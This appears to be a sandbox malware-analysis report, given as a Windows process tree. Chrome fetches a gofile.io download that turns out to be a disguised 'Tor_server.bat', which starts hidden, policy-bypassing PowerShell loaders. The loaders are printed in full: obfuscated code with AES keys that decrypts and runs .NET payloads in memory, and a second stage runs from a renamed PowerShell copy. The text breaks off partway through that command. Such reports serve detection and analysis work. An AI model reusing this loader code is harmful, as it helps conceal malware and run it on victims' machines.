  C:\Windows\System32\dllhost.exe /Processid:{b1a84f1e-6e96-41a2-b099-1293ef29c802}
  2⤵
  PID:3276
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{93830da7-e3b4-488d-9aa4-79a9854097ea}
  2⤵
  PID:164

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1020

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1148

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1260

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1412
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2664

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1752

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1932

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1864

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2300

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2572

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2884

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3716

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3988
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3988 -s 884
  2⤵
  - Program crash
  PID:6520
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3988 -s 864
  2⤵
  - Program crash
  PID:3056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4488

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4428
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4428 -s 784
  2⤵
  - Program crash
  PID:6420

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://gofile.io/d/2DDghj
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4124
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fff5a0c9758,0x7fff5a0c9768,0x7fff5a0c9778
    3⤵
    PID:4100
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:8
    3⤵
    PID:4240
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1592 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:2
    3⤵
    PID:3112
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2076 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:8
    3⤵
    PID:4296
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:3104
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2992 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:2024
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4616 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:3096
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3836 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:2404
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4928 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:4888
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4956 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:4880
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5340 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:720
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5624 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:1080
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5756 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:1728
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=6068 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:4384
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=6104 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:4364
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=6092 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:4924
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7020 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:8
    3⤵
    PID:528
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=7016 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:924
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=7860 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:764
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=7852 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:876
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=7572 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:824
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=7436 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:408
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8156 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:8
    3⤵
    PID:2144
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6588 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:8
    3⤵
    PID:4716
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6936 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:3556
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6108 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:4064
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=8624 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:4944
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=8968 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:2560
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=9148 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:1268
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=9472 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:5224
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=9636 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:5292
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=5892 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:5300
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=3704 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:5428
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=3708 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:5436
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=8644 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:5616
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=10144 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:5668
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=10180 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:5688
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=10444 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:5796
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=7288 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:5964
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=9764 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:6060
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=5492 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:3580
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=5460 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:6136
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=9928 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:2692
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=7688 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:1
    3⤵
    PID:6052
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7596 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:8
    3⤵
    PID:3468
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=836 --field-trial-handle=1784,i,13763368192197467326,12221415311937091351,131072 /prefetch:2
    3⤵
    PID:5296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Tor_server\Tor_server.bat" "
  2⤵
  PID:4144
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3748
- - C:\Users\Admin\Downloads\Tor_server\Tor_server.bat.exe
    "Tor_server.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oSQrn($ZeVYC){ $zeZjK=[System.Security.Cryptography.Aes]::Create(); $zeZjK.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zeZjK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zeZjK.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8BmyvjuHMJ5tOzAFS8WiFn9lK/Q4MbxC0JexUGmrSUA='); $zeZjK.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9vh1Iw96AMoyaJQxW/OGOQ=='); $wykrF=$zeZjK.CreateDecryptor(); $return_var=$wykrF.TransformFinalBlock($ZeVYC, 0, $ZeVYC.Length); $wykrF.Dispose(); $zeZjK.Dispose(); $return_var;}function hKuIZ($ZeVYC){ $oyWYk=New-Object System.IO.MemoryStream(,$ZeVYC); $DHmQw=New-Object System.IO.MemoryStream; $IstFA=New-Object System.IO.Compression.GZipStream($oyWYk, [IO.Compression.CompressionMode]::Decompress); $IstFA.CopyTo($DHmQw); $IstFA.Dispose(); $oyWYk.Dispose(); $DHmQw.Dispose(); $DHmQw.ToArray();}function IOLLO($ZeVYC,$kejag){ $KOKyF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$ZeVYC); $QwlUz=$KOKyF.EntryPoint; $QwlUz.Invoke($null, $kejag);}$eeeIZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Tor_server\Tor_server.bat').Split([Environment]::NewLine);foreach ($UYkNp in $eeeIZ) { if ($UYkNp.StartsWith(':: ')) { $JpAFv=$UYkNp.Substring(3); break; }}$Rmcyk=[string[]]$JpAFv.Split('\');$zMool=hKuIZ (oSQrn ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rmcyk[0])));$Djtyd=hKuIZ (oSQrn ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rmcyk[1])));IOLLO $Djtyd (,[string[]] (''));IOLLO $zMool (,[string[]] (''));
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    PID:5656
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = 